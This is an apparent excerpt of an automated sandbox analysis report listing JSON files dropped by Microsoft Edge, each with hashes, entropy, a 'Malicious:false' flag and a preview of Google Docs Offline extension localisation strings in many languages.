                                                                                                                                                      Preview:{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1895
                                                                                                                                                      Entropy (8bit):4.28990403715536
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
                                                                                                                                                      MD5:38BE0974108FC1CC30F13D8230EE5C40
                                                                                                                                                      SHA1:ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
                                                                                                                                                      SHA-256:30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
                                                                                                                                                      SHA-512:7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1042
                                                                                                                                                      Entropy (8bit):5.3945675025513955
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
                                                                                                                                                      MD5:F3E59EEEB007144EA26306C20E04C292
                                                                                                                                                      SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
                                                                                                                                                      SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
                                                                                                                                                      SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2535
                                                                                                                                                      Entropy (8bit):3.8479764584971368
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
                                                                                                                                                      MD5:E20D6C27840B406555E2F5091B118FC5
                                                                                                                                                      SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
                                                                                                                                                      SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
                                                                                                                                                      SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1028
                                                                                                                                                      Entropy (8bit):4.797571191712988
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
                                                                                                                                                      MD5:970544AB4622701FFDF66DC556847652
                                                                                                                                                      SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
                                                                                                                                                      SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
                                                                                                                                                      SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):994
                                                                                                                                                      Entropy (8bit):4.700308832360794
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
                                                                                                                                                      MD5:A568A58817375590007D1B8ABCAEBF82
                                                                                                                                                      SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
                                                                                                                                                      SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
                                                                                                                                                      SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2091
                                                                                                                                                      Entropy (8bit):4.358252286391144
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
                                                                                                                                                      MD5:4717EFE4651F94EFF6ACB6653E868D1A
                                                                                                                                                      SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
                                                                                                                                                      SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
                                                                                                                                                      SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2778
                                                                                                                                                      Entropy (8bit):3.595196082412897
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
                                                                                                                                                      MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                                                                                                                                      SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
                                                                                                                                                      SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                                                                                                                                      SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1719
                                                                                                                                                      Entropy (8bit):4.287702203591075
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
                                                                                                                                                      MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                                                                                                                                      SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                                                                                                                                      SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
                                                                                                                                                      SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):936
                                                                                                                                                      Entropy (8bit):4.457879437756106
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
                                                                                                                                                      MD5:7D273824B1E22426C033FF5D8D7162B7
                                                                                                                                                      SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                                                                                                                                      SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                                                                                                                                      SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):3830
                                                                                                                                                      Entropy (8bit):3.5483353063347587
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                                      MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                                      SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                                      SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                                      SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1898
                                                                                                                                                      Entropy (8bit):4.187050294267571
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                                                                                      MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                                                                                      SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                                                                                      SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                                                                                      SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):914
                                                                                                                                                      Entropy (8bit):4.513485418448461
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                                                                                      MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                                                                                      SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                                                                                      SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                                                                                                                      SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):878
                                                                                                                                                      Entropy (8bit):4.4541485835627475
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                                                                                      MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                                                                                      SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                                                                                      SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                                                                                      SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2766
                                                                                                                                                      Entropy (8bit):3.839730779948262
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                                                                                      MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                                                                                      SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                                      SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                                      SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):978
                                                                                                                                                      Entropy (8bit):4.879137540019932
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                                                                                      MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                                                                                      SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                                                                                                                      SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                                                                                      SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):907
                                                                                                                                                      Entropy (8bit):4.599411354657937
                                                                                                                                                      Encrypted:false
